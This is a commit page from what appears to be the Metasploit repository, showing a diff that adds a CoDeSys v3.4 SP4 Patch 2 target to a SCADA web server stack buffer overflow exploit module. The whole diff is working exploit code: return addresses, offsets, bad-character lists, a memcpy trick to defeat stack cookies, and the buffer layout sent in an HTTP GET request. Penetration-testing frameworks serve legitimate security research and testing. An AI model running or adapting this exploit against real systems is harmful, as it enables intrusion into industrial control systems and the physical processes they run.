Add new v3.4 target by Michael Coppola (Feature rapid7#6207)

soh-cah-toa · Jan 10, 2012 · bc9014e · bc9014e
1 parent b767676
commit bc9014e
Showing 1 changed file with 39 additions and 16 deletions.
diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'            => 'CoDeSys SCADA v2.3 Webserver Stack Buffer Overflow',
+			'Name'            => 'SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow',
 			'Description'     => %q{
 				This module exploits a remote stack buffer overflow vulnerability in
 				3S-Smart Software Solutions product CoDeSys Scada Web Server Version 1.1.9.9.
@@ -25,7 +25,8 @@ def initialize(info = {})
 					'Luigi Auriemma', # Original discovery and poc
 					'Celil UNUVER',
 					'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
-					'sinn3r'
+					'sinn3r',
+					'Michael Coppola'
 				],
 			'References'      =>
 				[
@@ -40,28 +41,37 @@ def initialize(info = {})
 				{
 					'EXITFUNC' => 'process',
 					'DisablePayloadHandler' => 'false',
-					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Platform'        => 'win',
 			'Payload'         =>
 				{
-					'size'     => 4000,
-					'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e",
+					'size'     => 650,
+					'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",
 				},
 
 			'Targets'         =>
 				[
 					[
-						'Windows XP SP3',
+						'CoDeSys v2.3 on Windows XP SP3',
 						{
-							'Ret'    => 0x7E4456F7,
+							'Ret'    => 0x7E4456F7, # jmp esp user32
 							'Offset' => 775
 						}
-					], # jmp esp user32
+					],
+					[
+						'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',
+						{
+							# Abuse a memcpy() call to circumvent stack cookies
+							'Offset' => 525,
+							'Ret'    => 0x02CDFD68,
+							'Src'    => 0x02CDFD58,
+							'Dest'   => 0x02CDFA14
+						}
+					],
 				],
 			'Privileged'     => false,
-			'DisclosureDate' => 'Dec 02 2011',
-			'DefaultTarget'  => 0))
+			'DisclosureDate' => 'Dec 02 2011'
+		))
 
 		register_options([Opt::RPORT(8080)], self.class)
 	end
@@ -85,17 +95,30 @@ def check
 	def exploit
 		connect
 
-		buffer =  rand_text(target['Offset'])
-		buffer << [target.ret].pack('V')
-		buffer << make_nops(8)
-		buffer << payload.encoded
+		if target.name =~ /v2\.3/
+			buffer =  rand_text(target['Offset'])
+			buffer << [target.ret].pack('V')
+			buffer << make_nops(8)
+			buffer << payload.encoded
+
+		else
+			# CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3
+			buffer =  rand_text_alphanumeric(target['Offset'])
+			buffer << [target.ret].pack('V')
+			buffer << [target['Src']].pack('V')
+			buffer << [target['Dest']].pack('V')
+			buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison
+			buffer << make_nops(8)
+			buffer << payload.encoded
+			buffer << "\\a"
+		end
 
 		sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"
 
 		print_status("Trying target #{target.name}...")
 		sock.put(sploit)
-		res = sock.recv(1024)
-		print_line(res)
+		res = sock.get_once
+		print_line(res) unless res.nil?
 
 		handler
 		disconnect